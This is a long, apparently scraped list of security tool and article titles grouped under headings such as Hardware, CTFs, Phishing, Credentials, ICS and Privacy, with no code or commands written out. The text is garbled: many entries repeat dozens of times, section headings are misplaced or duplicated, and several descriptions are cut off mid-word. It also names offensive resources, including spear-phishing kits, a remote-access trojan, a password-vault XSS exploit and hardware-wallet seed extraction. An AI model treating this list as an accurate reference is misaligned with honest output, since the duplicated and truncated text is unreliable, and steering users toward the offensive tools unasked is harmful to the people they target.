- Google Chromium
- openvotenetwork
- Tools by Morphus Labs
- Stratosphere IPS
- Convert nmap Scans into Beautiful HTML Pages
- GeoInt
- nipe
- solo
- Joint Report On Publicly Available Hacking Tools
- Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
- Command-Line Snippets - line commands that make your life easier.
- IP-to-ASN - Team Cymru
- free Entropy Service
- Correct Horse Battery Staple
- Hostintel - [github](https://github.com/keithjjones/hostintel)
- commando packages
- Introducing Inkdrop 4
- how we uncovered an attack on government entities in Europe
- inlets
- Cloning a MAC address to bypass a captive portal
- Open Steno Project
- Machine Learning on Encrypted Data Without Decrypting It
- Raspberry pi as poor man’s hardware hacking tool
- VoightKampff
- John the Ripper in the cloud
- SpamCop
- Rawsec's CyberSecurity Inventory - cybersecurity-inventory)
- gaijin tools
- glsnip
- CERTrating - tool.html)
- Cybersecurity Maturity Model Certification (CMMC)
- What is the Cybersecurity Maturity Model Certification (CMMC)
- Who needs to have Cybersecurity Maturity Model Certification (CMMC)
- Find Virtual Hosts for Any IP Address
- Security Tools
- Gamifying machine learning for stronger security and AI models
- BashScan
- Ronin
- Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
- Introducing Inkdrop 4
- Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
- Introducing Inkdrop 4
- Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
- Introducing Inkdrop 4
- Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
- Introducing Inkdrop 4
- Tools by Morphus Labs
- Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
- Introducing Inkdrop 4
- Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
- Introducing Inkdrop 4
- Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
- Introducing Inkdrop 4
- Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
- Introducing Inkdrop 4
- Introducing Inkdrop 4
- Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
- Introducing Inkdrop 4
- Raspberry pi as poor man’s hardware hacking tool
- Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
- Introducing Inkdrop 4
- Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
- Introducing Inkdrop 4
- Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
- Introducing Inkdrop 4
- Raspberry pi as poor man’s hardware hacking tool
- Introducing Inkdrop 4
- Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
- Introducing Inkdrop 4
- Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
- Introducing Inkdrop 4
- Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
- Introducing Inkdrop 4
- Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
- Introducing Inkdrop 4
- Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
- Introducing Inkdrop 4
- Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
- Introducing Inkdrop 4
- Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
- Introducing Inkdrop 4
- Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
- Introducing Inkdrop 4
- Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
- Introducing Inkdrop 4
- SubSeven is Back - made version that delivers a retro remote control experience with no loss of functionality and no external dependencies required.
- Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
- Introducing Inkdrop 4
- Introducing Inkdrop 4
- Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
- XPoCe - XPC Snooping utilties for MacOS and iOS (version 2.0)
- freedomfighting
- Introducing Inkdrop 4
- Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
- Introducing Inkdrop 4
- Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
- Introducing Inkdrop 4
- Introducing Inkdrop 4
- Introducing Inkdrop 4
- Introducing Inkdrop 4
- Introducing Inkdrop 4
-
Note-taking
- cherrytree
- obsidian
- CudaText - T/CudaText)
- Compare AsciiDoc and Markdown
-
IP Reputation
-
Shell tools
-
Search Engines
- DarkSearch - the-1st-real-search-engine-dark-web-darksearch-vs-ahmia-84852fd4c51b)
- Search engines for Hackers
- censys.io
- shodan.io
- TriOp
- viz.greynoise.io
- zoomeye.org
- wigle.net
- publicwww.com
- hunter.io
- haveibeenpwned.com
- haveibeenEMOTET
- thispersondoesnotexist.com
- osintframework.com
- NAPALM FTP Indexer
- Insecam
- viz.greynoise.io
-
VPN
- jigsaw project - Code/outline-server): VPN Server.
- WireGuard - of-the-art cryptography. It aims to be faster, simpler, leaner, and more useful than IPSec, while avoiding the massive headache.
- Crockford’s base 32 encoding
- Sputnik - An Open Source Intelligence Browser Extension
- uncaptcha2
- AirVPN
- Build your own private WireGuard VPN with PiVPN
- Sputnik - An Open Source Intelligence Browser Extension
- AirVPN
- Sputnik - An Open Source Intelligence Browser Extension
- Sputnik - An Open Source Intelligence Browser Extension
- Sputnik - An Open Source Intelligence Browser Extension
- Sputnik - An Open Source Intelligence Browser Extension
- Sputnik - An Open Source Intelligence Browser Extension
- AirVPN
- Sputnik - An Open Source Intelligence Browser Extension
- Sputnik - An Open Source Intelligence Browser Extension
- Sputnik - An Open Source Intelligence Browser Extension
- Sputnik - An Open Source Intelligence Browser Extension
- Sputnik - An Open Source Intelligence Browser Extension
- Sputnik - An Open Source Intelligence Browser Extension
- Sputnik - An Open Source Intelligence Browser Extension
- Sputnik - An Open Source Intelligence Browser Extension
- Sputnik - An Open Source Intelligence Browser Extension
- PCredz - RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.
- Sputnik - An Open Source Intelligence Browser Extension
- Sputnik - An Open Source Intelligence Browser Extension
- jigsaw project - Code/outline-server): VPN Server.
-
Secure Sharing
- Cryptomator - platform transparent client-side encryption of your files in the cloud. [code](https://github.com/cryptomator/cryptomator)
- VeraCrypt
- CipherShed
- DiskCryptor
-
-
Archs
-
Hardware
- SkyJack
- Wifi-Ducky-ESPUSB
- USB Attacks: Past, Present and Future - VTYuo&feature=youtu.be) - P4wnP1 is below on pentesting section. [wrap-up here](https://twitter.com/RoganDawes/status/1303297634858393608)
- PLATYPUS - based power side-channel attacks on Intel server, desktop and laptop CPUs.
- VoltPillager - based fault injection attacks against Intel SGX Enclaves using the SVID voltage scaling interface
- ToorCon 14 Badge
- HammerKit - source library for inducing and characterizing rowhammer that provides out-of-the-box support for Chrome OS platforms.
- Evil Logitech - erm I ment USB cable. [USB Samurai](https://infosecwriteups.com/usbsamurai-a-remotely-controlled-malicious-usb-hid-injecting-cable-for-less-than-10-ebf4b81e1d0b?gi=ade3f719f778) [For Dummies](https://infosecwriteups.com/usbsamurai-for-dummies-4bd47abf8f87)
- Hacker's guide to deep-learning side-channel attacks: the theory
- Guarding Against Physical Attacks: The Xbox One Story
- Common BMC vulnerabilities and how to avoid repeating them - 18/Wed-August-8/us-18-Waisman-Soler-The-Unbearable-Lightness-of-BMC.pdf) [Perilous Peripherals: The Hidden Dangers Inside Windows & Linux Computers](https://eclypsium.com/2020/2/18/unsigned-peripheral-firmware/)
- BrakTooth
- Breaking the Bluetooth Pairing: Fixed Coordinate Invalid Curve Attack
- The Practical Guide to Hacking Bluetooth Low Energy
- A Practical Guide to BLE Throughput
- Exploiting IoT enabled BLE smart bulb security
- Airspy-Utils
- Cracking WiFi at Scale with One Simple Trick
- hcxdumptool
- Wifi-Ducky-ESPUSB
- USB Attacks: Past, Present and Future - VTYuo&feature=youtu.be) - P4wnP1 is below on pentesting section. [wrap-up here](https://twitter.com/RoganDawes/status/1303297634858393608)
- PLATYPUS - based power side-channel attacks on Intel server, desktop and laptop CPUs.
- VoltPillager - based fault injection attacks against Intel SGX Enclaves using the SVID voltage scaling interface
- ToorCon 14 Badge
- HammerKit - source library for inducing and characterizing rowhammer that provides out-of-the-box support for Chrome OS platforms.
- Evil Logitech - erm I ment USB cable. [USB Samurai](https://infosecwriteups.com/usbsamurai-a-remotely-controlled-malicious-usb-hid-injecting-cable-for-less-than-10-ebf4b81e1d0b?gi=ade3f719f778) [For Dummies](https://infosecwriteups.com/usbsamurai-for-dummies-4bd47abf8f87)
- Hacker's guide to deep-learning side-channel attacks: the theory
- Guarding Against Physical Attacks: The Xbox One Story
- Common BMC vulnerabilities and how to avoid repeating them - 18/Wed-August-8/us-18-Waisman-Soler-The-Unbearable-Lightness-of-BMC.pdf) [Perilous Peripherals: The Hidden Dangers Inside Windows & Linux Computers](https://eclypsium.com/2020/2/18/unsigned-peripheral-firmware/)
- BrakTooth
- Breaking the Bluetooth Pairing: Fixed Coordinate Invalid Curve Attack
- The Practical Guide to Hacking Bluetooth Low Energy
- A Practical Guide to BLE Throughput
- Exploiting IoT enabled BLE smart bulb security
- Airspy-Utils
- Cracking WiFi at Scale with One Simple Trick
- hcxdumptool
- SkyJack
- eaphammer - Enterprise networks. Indirect wireless pivots using hostile portal attacks.
- whereami
- Car hijacking swapping a single bit
- Hacking a VW Golf Power Steering ECU - Part 1, [Part 2](https://blog.willemmelching.nl/carhacking/2022/01/02/vw-part2/) [Part 3](https://blog.willemmelching.nl/carhacking/2022/01/02/vw-part3/) and [Part 4](https://blog.willemmelching.nl/carhacking/2022/01/02/vw-part4/). [VW PQ35 EPS flasher](https://github.com/pd0wm/pq-flasher)
- Hacking Printers Wiki
- Full key extraction of NVIDIA™ TSEC
- The x86 architecture is the weirdo, part 2
- Reverse Engineering Yaesu FT-70D Firmware Encryption
- Reverse-engineering an airspeed/Mach indicator from 1977
- Stepping Insyde System Management Mode
- eaphammer - Enterprise networks. Indirect wireless pivots using hostile portal attacks.
- whereami
- Car hijacking swapping a single bit
- Hacking a VW Golf Power Steering ECU - Part 1, [Part 2](https://blog.willemmelching.nl/carhacking/2022/01/02/vw-part2/) [Part 3](https://blog.willemmelching.nl/carhacking/2022/01/02/vw-part3/) and [Part 4](https://blog.willemmelching.nl/carhacking/2022/01/02/vw-part4/). [VW PQ35 EPS flasher](https://github.com/pd0wm/pq-flasher)
- BMC-Tools
- Hacking Printers Wiki
- Full key extraction of NVIDIA™ TSEC
- The x86 architecture is the weirdo, part 2
- Reverse Engineering Yaesu FT-70D Firmware Encryption
- Reverse-engineering an airspeed/Mach indicator from 1977
- Stepping Insyde System Management Mode
- USB Attacks: Past, Present and Future - VTYuo&feature=youtu.be) - P4wnP1 is below on pentesting section. [wrap-up here](https://twitter.com/RoganDawes/status/1303297634858393608)
- PLATYPUS - based power side-channel attacks on Intel server, desktop and laptop CPUs.
- VoltPillager - based fault injection attacks against Intel SGX Enclaves using the SVID voltage scaling interface
- ToorCon 14 Badge
- Evil Logitech - erm I ment USB cable. [USB Samurai](https://infosecwriteups.com/usbsamurai-a-remotely-controlled-malicious-usb-hid-injecting-cable-for-less-than-10-ebf4b81e1d0b?gi=ade3f719f778) [For Dummies](https://infosecwriteups.com/usbsamurai-for-dummies-4bd47abf8f87)
- Common BMC vulnerabilities and how to avoid repeating them - 18/Wed-August-8/us-18-Waisman-Soler-The-Unbearable-Lightness-of-BMC.pdf) [Perilous Peripherals: The Hidden Dangers Inside Windows & Linux Computers](https://eclypsium.com/2020/2/18/unsigned-peripheral-firmware/)
- Exploiting IoT enabled BLE smart bulb security
- Cracking WiFi at Scale with One Simple Trick
- Car hijacking swapping a single bit
- Hacking a VW Golf Power Steering ECU - Part 1, [Part 2](https://blog.willemmelching.nl/carhacking/2022/01/02/vw-part2/) [Part 3](https://blog.willemmelching.nl/carhacking/2022/01/02/vw-part3/) and [Part 4](https://blog.willemmelching.nl/carhacking/2022/01/02/vw-part4/). [VW PQ35 EPS flasher](https://github.com/pd0wm/pq-flasher)
- Reverse Engineering Yaesu FT-70D Firmware Encryption
- Reverse-engineering an airspeed/Mach indicator from 1977
- Breaking the Bluetooth Pairing: Fixed Coordinate Invalid Curve Attack
- hcxdumptool
-
CTFs tools
- LAB ENVIRONMENT
- HUB
- arm vm working out of the box for everyone
- Statically compiled ARM binaries for debugging and runtime analysis.
- Hacker Finds Hidden 'God Mode' on Old x86 CPUs - > [rosenbridge](https://github.com/xoreaxeaxeax/rosenbridge): Hardware backdoors in some x86 CPUs
- USBHarpoon
- A 2018 practical guide to hacking RFID/NFC
- riscv-ida - V ISA processor module for IDAPro 7.x
- mac-age
- IntelTEX-PoC
- me_cleaner
- Potential candidate for open source bootloaders? Complete removal of Intel ME firmware possible on certain Intel HEDT/Server platforms
- IDA-scripts
- Something about IR optimization
- Dragonblood
- Unfixable Seed Extraction on Trezor - A practical and reliable attack. An attacker with a stolen device can extract the seed from the device. It takes less than 5 minutes and the necessary materials cost around 100$.
- Extracting seed from Ellipal wallet
- Breaking Trezor One with Side Channel Attacks
- Rewriting Functions in Compiled Binaries
- Deep Dive
- Saleae
- wacker
- Osiris
- One Glitch to Rule Them All: Fault Injection Attacks Against AMD's Secure Encrypted Virtualization
- LAB ENVIRONMENT
- HUB
- arm vm working out of the box for everyone
- Statically compiled ARM binaries for debugging and runtime analysis.
- Hacker Finds Hidden 'God Mode' on Old x86 CPUs - > [rosenbridge](https://github.com/xoreaxeaxeax/rosenbridge): Hardware backdoors in some x86 CPUs
- USBHarpoon
- Patching Binaries with Radare2 - ARM64
- A 2018 practical guide to hacking RFID/NFC
- riscv-ida - V ISA processor module for IDAPro 7.x
- mac-age
- Lexra - bit variant of the MIPS architecture.
- IntelTEX-PoC
- me_cleaner
- Something about IR optimization
- Unfixable Seed Extraction on Trezor - A practical and reliable attack. An attacker with a stolen device can extract the seed from the device. It takes less than 5 minutes and the necessary materials cost around 100$.
- Extracting seed from Ellipal wallet
- Breaking Trezor One with Side Channel Attacks
- Rewriting Functions in Compiled Binaries
- Saleae
- Osiris
- One Glitch to Rule Them All: Fault Injection Attacks Against AMD's Secure Encrypted Virtualization
- LAB ENVIRONMENT
- A 2018 practical guide to hacking RFID/NFC
- Saleae
- Osiris
- One Glitch to Rule Them All: Fault Injection Attacks Against AMD's Secure Encrypted Virtualization
- IDA-scripts
- The Hacker's Hardware Toolkit
-
ARM
- AZM Online Arm Assembler
- Understanding the Glibc Heap Implementation
- Understanding the GLIBC Heap Implementation
- Heap Exploit Development - the-wild iOS 0-day. [thread](https://threader.app/thread/1168969597799866368)
- ARM64 Reversing and Exploitation
- AZM Online Arm Assembler
- Understanding the Glibc Heap Implementation
- Understanding the GLIBC Heap Implementation
- Heap Exploit Development - the-wild iOS 0-day. [thread](https://threader.app/thread/1168969597799866368)
- ARM64 Reversing and Exploitation
- ARM Instruction Set + Simple Heap Overflow
- Use After Free
- A Simple ROP Chain
- AZM Online Arm Assembler
- Understanding the GLIBC Heap Implementation
- ARM64 Reversing and Exploitation
-
-
Credentials
-
WebServers
- XSS Exploit code for retrieving passwords stored in a Password Vault
- Was my password leaked?
- bitwarden_rs
- Depix
- Launch PowerShell Script From Within KeePass And Include Password Secure String Credential - for-keepass-password-manager/), [PowerShell KeePass](https://github.com/PSKeePass/PoShKeePass).
- WhiteIntel
-
Tokens
- Introducing the Qubes U2F Proxy
- Use YubiKey security key to sign into AWS Management Console with YubiKey for multi-factor authentication
- Using a Yubikey for GPG and SSH - 0day.work
- PIN and Management Key
- Improve login security with challenge-response authentication
- URU Card - card](https://github.com/uru-card/uru-card)
- yubikey-ssh-setup
-
-
CTFs
-
API
- Deploying CTFd
- CTFd Tips
- SA-ctf_scoreboard
- The fast, easy, and affordable way to train your hacking skills.
- Write-ups for crackmes and CTF challenges
- $50 million CTF Writeup
- Alice sent Bob a meme - UTCTF 2019. tl;dr: Extract data from given images using binwalk, Tranform given diophantine equation into a cubic curve and retrieve EC parameters, Solve ECDLP given in extracted data using Pohlig Hellman Algorithm.
- RECOVERING A FULL PEM PRIVATE KEY WHEN HALF OF IT IS REDACTED
- BalsnCTF-2019
- FIRST SecLounge CTF 2020 Solutions
- Hitcon2017CTF - 家徒四壁~Everlasting Imaginative Void~
- Closing Capture the Flag Session & Winning Team Presentation
- Capture the Flag
- DEF CON CTF 2021 QUALS - ctf-2021-finals/), [files](https://github.com/o-o-overflow)
- eDump
- RET2 WarGames
- CTF: Aprende «hacking» jugando
- HackLab #1
- Solving Zden’s “1BiTCoiN WHiTe PaPeR” Puzzle
- Deploying CTFd
- CTFd Tips
- SA-ctf_scoreboard
- The fast, easy, and affordable way to train your hacking skills.
- Write-ups for crackmes and CTF challenges
- Pwn2Win 2018 - pt1.txt)
- Leap Security
- 35c3ctf-challs
- ctf-tasks - level CTF challenges developed over the years.
- $50 million CTF Writeup
- Alice sent Bob a meme - UTCTF 2019. tl;dr: Extract data from given images using binwalk, Tranform given diophantine equation into a cubic curve and retrieve EC parameters, Solve ECDLP given in extracted data using Pohlig Hellman Algorithm.
- RECOVERING A FULL PEM PRIVATE KEY WHEN HALF OF IT IS REDACTED
- BalsnCTF-2019
- HackTheBox CTF Cheatsheet
- Mumbai:1 Vulnhub Walkthrough
- 0x0G 2020 CTF
- Hitcon2017CTF - 家徒四壁~Everlasting Imaginative Void~
- r2dec
- SASatHome
- Crypton
- Bash injection without letters or numbers - 33c3ctf hohoho
- Writeup CTF - Web API Exploitation
- Closing Capture the Flag Session & Winning Team Presentation
- attack & defense CTF demo
- CTF-Writeups
- Capture the Flag
- DEF CON CTF 2021 QUALS - ctf-2021-finals/), [files](https://github.com/o-o-overflow)
- eDump
- HITB SECCCONF EDU CTF 2021
- CTF KAVACON 21 – LUZ ROJA, LUZ VERDE
- RET2 WarGames
- HackLab #1
- Penetration testing laboratories "Test lab"
- Solving Zden’s “1BiTCoiN WHiTe PaPeR” Puzzle
- CTFd Tips
- DEF CON CTF 2021 QUALS - ctf-2021-finals/), [files](https://github.com/o-o-overflow)
- HackLab #1
- CTF: Aprende «hacking» jugando
- FIRST SecLounge CTF 2020 Solutions
-
CTFs tools
- CTFs-Exploits
- nc-chat-ctf
- thg-framework
- CTFs-Exploits
- nc-chat-ctf
- thg-framework
- Super-Guesser-ctf
- Ciphr - army knife for performing and composing encoding, decoding, encryption, decryption, hashing, and other various cryptographic operations on streams of data from the command line; mostly intended for ad hoc, infosec-related uses.
- Ciphr - army knife for performing and composing encoding, decoding, encryption, decryption, hashing, and other various cryptographic operations on streams of data from the command line; mostly intended for ad hoc, infosec-related uses.
- Real World CTF 2023
- Real World CTF 2023
-
-
Phreak
-
CTFs tools
- Into the wild: Gaining access to SS7 - Part 1: Finding an access point
- SCTP/SIGTRAN & SS7 Overview
- Security Penetration Test Framework for the Diameter Protocol
- Signaling Security in LTE Roaming
- Phrack
- Into the wild: Gaining access to SS7 - Part 1: Finding an access point
- SCTP/SIGTRAN & SS7 Overview
- Security Penetration Test Framework for the Diameter Protocol
- Signaling Security in LTE Roaming
- Phrack
- SCTP/SIGTRAN & SS7 Overview
- Security Penetration Test Framework for the Diameter Protocol
- Signaling Security in LTE Roaming
- Phrack
-
-
Phishing
-
Steganography
- Phishing on Twitter
- shellphish
- pompa - featured spear-phishing toolkit - web front-end.
- Using phishing tools against the phishers
- Lure
- PhishingKitTracker
- SimplyTemplate
- Compromising operating systems through fake software updates
- MurmurHash
- SniperPhish - Email Spear Phishing Toolkit
- phishing-frenzy
- ThePhish
- Phishing on Twitter
- pompa - featured spear-phishing toolkit - web front-end.
- Using phishing tools against the phishers
- Lure
- Compromising operating systems through fake software updates
- SniperPhish - Email Spear Phishing Toolkit
- Phishing 101: why depend on one suspicious message subject when you can use many?
- Widespread credential phishing campaign abuses open redirector links
- ThePhish
- Using phishing tools against the phishers
-
-
Risk Assessment and Vulnerability Management
-
AWS
- Gerenciamento de Risco Cibernético
- RITA (Real Intelligence Threat Analytics)
- Blended threats are the future, because no matter how good your cloud security is, at some point a grumpy SRE who feels jilted over some work BS is gonna enjoy pulling one over on those C suite assholes, for $20k cash
- ISO27001 audit in real-time....
- Gearing Towards Your Next Audit
- Nuclei unleashed - writing first exploit
- Secure design principles
- Risk Assessment of GitHub Copilot
- ISA/IEC 62443
- Understanding IEC 62443
- NERC CIP
- Threat Modeling Manifesto
- Risk Management Framework for Systems and Organizations Introductory Course
- RITA (Real Intelligence Threat Analytics)
-
Guidelines
-
-
ICS (SCADA)
-
Guidelines
- THE RACE TO NATIVE CODE EXECUTION IN PLCS
- The Top 20 Secure PLC Coding Practices Project
- IEEE C37.118.1-2011 - IEEE Standard for Synchrophasor Measurements for Power Systems
- Measuring relays and protection equipment - Part 118-1: Synchrophasor for power systems - Measurements
- IEEE C37.118 protocol
- IEEE C37.118 Synchrophasor Protocol - wireshark wiki
- INFRA:HALT
- Findings From Examining More Than a Decade of Public ICS/OT Exploits
- ATT&CK® for Industrial Control Systems
-
-
Radio
-
Guidelines
- Qualcomm chain-of-trust
- Presenting QCSuper - based phones. [github](https://github.com/P1sec/QCSuper)
- Logitech keyboards and mice vulnerable to extensive cyber attacks
- A look at GSM
- srsLTE
- List of software-defined radios
- Spectrum Analyzers, Linux
- Sonic Visualiser
- spek
- SpectMorph
- The LibreCellular project - defined radio (SDR) hardware.
- List of software-defined radios
- The LibreCellular project - defined radio (SDR) hardware.
-
Satellite
-
-
Social Engineering
-
Satellite
- The Basics of Social Engineering
- Never Split Difference - Chris Voss
- The Carisma Myth - Olivia Fox Cabane
- Hacking the Human - Ian Mann
- Chris Hadnagy
- Joe Navarro
-
-
Privacy
-
Secure Sharing
- Everything Old is New Part 2: Why Online Anonymity Matters
- Data Security on Mobile Devices
- TorBox Wireless Manager
- The Instagram ads Facebook won't show you
- 4TB of stolen identities are being circulated online following a breach on Oriflame
- How to choose a browser for everyday use? - mail providers - which one to choose?](https://digdeeper.neocities.org/ghost/email.html) and [Search Engines - which one to choose?](https://digdeeper.neocities.org/ghost/search.html)
- Disinformation guru “Hacker X” names his employer: NaturalNews.com
- Hey Siri, Find My Ex - Enabled Abuse in the Apple Ecosystem.
- Keyhole Imaging
- Your Roomba May Be Mapping Your Home, Collecting Data That Could Be Shared
- Global Presence of Authoritarian Tech
- Zooming in on Zero-click Exploits
- Breach alert: on Apr 7th -based fintech IUGU exposed its entire database, incl. ALL customers and account details: emails, phones, addresses, invoices etc. IP with 1.7TB indexed by Shodan, I immediately alerted the company, db was taken down within an hour. No response.
- Anyone can use this powerful facial-recognition tool — and that's a problem
- Using “Master Faces” to Bypass Face-Recognition Authenticating Systems - Assisted Latent Space Evolution](https://arxiv.org/pdf/2108.01077.pdf), two [other](https://gizmodo.com/master-face-researchers-say-theyve-found-a-wildly-succ-1847420710) [news](https://www.unite.ai/master-faces-that-can-bypass-over-40-of-facial-id-authentication-systems/)
- Forensic Methodology Report: How to catch NSO Group’s Pegasus
- Who is being monitored?
-
-
General
-
Secure Sharing
- Thomas Roccia's #100DaysOfCode challenge
- Thomas Roccia's #100DaysOfCode challenge
- Examples of regular expressions
- Capture WiFi / WLAN / 802.11 Probe Request with tcpdump
- Looking for value in EV Certificates
- How to find hidden cameras
- Our latest updates on Fully Homomorphic Encryption - homomorphic-encryption)
- Introducing Certificate Transparency and Nimbus
- A Few Thoughts on Cryptographic Engineering
- Mailfence
- Threat Hunting Workshop - Methodologies for Threat Analysis
- The Illustrated TLS Connection
- Practical Cryptography
- Thieves and Geeks: Russian and Chinese Hacking Communities
- HTTP/3 Explained - [github](https://github.com/bagder/http3-explained)/[http2 explained](https://daniel.haxx.se/http2/) - [github](https://github.com/bagder/http2-explained)
- Template for Data Protection Impact Assessment (DPIA)
- hash collisions
- Shodan - A tool for Security and Market Research
- Engineering Security
- Automatic SSL with Now and Let's Encrypt
- Hacking Digital Calipers
- Binary Hardening in IoT products
- Bolstering Security with Cyber Intelligence
- THE DEFINITIVE GUIDE TO ENCRYPTION KEY MANAGEMENT FUNDAMENTALS
- Explanatory Reportto the Additional Protocol to the Convention on Cybercrime
- Thomas Roccia's #100DaysOfCode challenge
- Audi A7 2014 MMI Mishandles the Format-string Specifiers
- BoF + Sockets + Erros de Codificação com o Python3
- List of Rainbow Tables
- Do you hear what I hear? A cyberattack.
- Ghost in the ethernet optic
- Thomas Roccia's #100DaysOfCode challenge
- Thomas Roccia's #100DaysOfCode challenge
- Плакаты по информационной безопасности Российской армии
- Thomas Roccia's #100DaysOfCode challenge
- Thomas Roccia's #100DaysOfCode challenge
- Thomas Roccia's #100DaysOfCode challenge
- Thomas Roccia's #100DaysOfCode challenge
- Thomas Roccia's #100DaysOfCode challenge
- Thomas Roccia's #100DaysOfCode challenge
- Thomas Roccia's #100DaysOfCode challenge
- Thomas Roccia's #100DaysOfCode challenge
- Thomas Roccia's #100DaysOfCode challenge
- Thomas Roccia's #100DaysOfCode challenge
- Thomas Roccia's #100DaysOfCode challenge
- Thomas Roccia's #100DaysOfCode challenge
- Thomas Roccia's #100DaysOfCode challenge
- Decent Security
- Thomas Roccia's #100DaysOfCode challenge
- Thomas Roccia's #100DaysOfCode challenge
- Thomas Roccia's #100DaysOfCode challenge
- Thomas Roccia's #100DaysOfCode challenge
- Introducing Certificate Transparency and Nimbus
- Thomas Roccia's #100DaysOfCode challenge
-
-
Resources
-
Training and Certifications
- How I Passed OSCP with 100 points in 12 hours without Metasploit in my first attempt
- How I Passed OSCP with 100 points in 12 hours without Metasploit in my first attempt
- AWAE/OSWE
- From AWAE to OSWE: The Preperation Guide
- Security Certification Progress Chart
- Hacking Your Pen Testing / Red Teaming Career: Part 1
- PentesterAcademy
- RED TEAM Operator: Malware Development Essentials Course - maldev-intermediate)
- OSCP Journey
- Hacking Dojo
- Learning from your mistakes as an offensive security professional
- The Ultimate List of SANS Cheat Sheets
- Posters: Pen Testing
- #OSCP exam advice thread.
- Targeted Malware Reverse Engineering Workshop
- OpenSecurity
- OPSEC: In Theory and Practice
- Understand Kerberos Delegation, Active Directory Security Descriptors, Windows Lateral Movements, etcc.
- Free Incident Response Training Plan - ir-training-plan-part-two). [BaselineTraining](https://github.com/rj-chap/BaselineTraining): Notes from my "Implementing a Kick-Butt Training Program: Blue Team GO!" talk.
- CyberDefenders
- How I Passed OSCP with 100 points in 12 hours without Metasploit in my first attempt
- SOC Core Skills w/ John Strand
- How I Passed OSCP with 100 points in 12 hours without Metasploit in my first attempt
- OSCP — Meu caminho até a terra prometida.
- How I Passed OSCP with 100 points in 12 hours without Metasploit in my first attempt
- Burp Suite Academy
- How I Passed OSCP with 100 points in 12 hours without Metasploit in my first attempt
- How I Passed OSCP with 100 points in 12 hours without Metasploit in my first attempt
- How I Passed OSCP with 100 points in 12 hours without Metasploit in my first attempt
- How I Passed OSCP with 100 points in 12 hours without Metasploit in my first attempt
- How I Passed OSCP with 100 points in 12 hours without Metasploit in my first attempt
- How I Passed OSCP with 100 points in 12 hours without Metasploit in my first attempt
- How I Passed OSCP with 100 points in 12 hours without Metasploit in my first attempt
- How I Passed OSCP with 100 points in 12 hours without Metasploit in my first attempt
- How I Passed OSCP with 100 points in 12 hours without Metasploit in my first attempt
- How I Passed OSCP with 100 points in 12 hours without Metasploit in my first attempt
- How I Passed OSCP with 100 points in 12 hours without Metasploit in my first attempt
-
Configs
- 13 Best New Software Security Books To Read In 2021
- 'pwnable.kr' - commercial wargame site which provides various pwn challenges regarding system exploitation. the main purpose of pwnable.kr is 'fun'.
- Pwnable.tw
- Security Zines
- pwn.college - stage education platform for students (and other interested parties) to learn about, and practice, core cybersecurity concepts in a hands-on fashion. It is designed to take a “white belt” in cybersecurity to becoming a “blue belt”, able to approach (simple) CTFs and wargames. The philosophy of pwn.college is “practice makes perfect”.
-
Conferences and Slides
- H2HC - Hackers To Hackers Conference:
- H2HC 2021
- Modchips of the State - chain - CCC 2018
- Cybersecurity as Realpolitik
- Expert demonstrated a new PHP code execution attack
- supply chain issues talk
- MFA-ing the Un-MFA-ble: Protecting Auth Systems' Core Secrets
- Doublethink - Architecture Assembly Polyglot by Robert Xiao
- SAFEMODE - safemode/dc-safemode-villages.html), [BADGE](https://www.defcon.org/html/defcon-safemode/dc-safemode-badge.html), [ics-forum](https://forum.defcon.org/node/232698)
- OpenSOC Blue Team CTF @ DEFCON 29 FAQ
- Using Barq to perform AWS Post-Exploitation Actions
- SBSeg 2018
- APFS Internals - Jonathan Levin
- Protecting the Garden of Eden - Patrick Wardle
- Code signing flaw in macOS - Thomas Reed
- From Apple Seeds to Apple Pie - Sarah Edwards
- When Macs Come Under ATT&CK - Richie Cyrus
- Crashing to Root - Bradon Azad
- Leveraging Apple's Game Engine for Advanced Threat Detection - Josh Stein / Jon Malm
- MacDoored - Jaron Bradley
- Who Moved my Pixels? - Mikahail Sosonkin
- Aliens Among Us - Michael Lynn
- r2con2020
- r2con2020 DAY3 Live Stream
- MISP Summit 05
- Hack.lu 2019 Day #1 Wrap-Up
- The Open Source Security Software
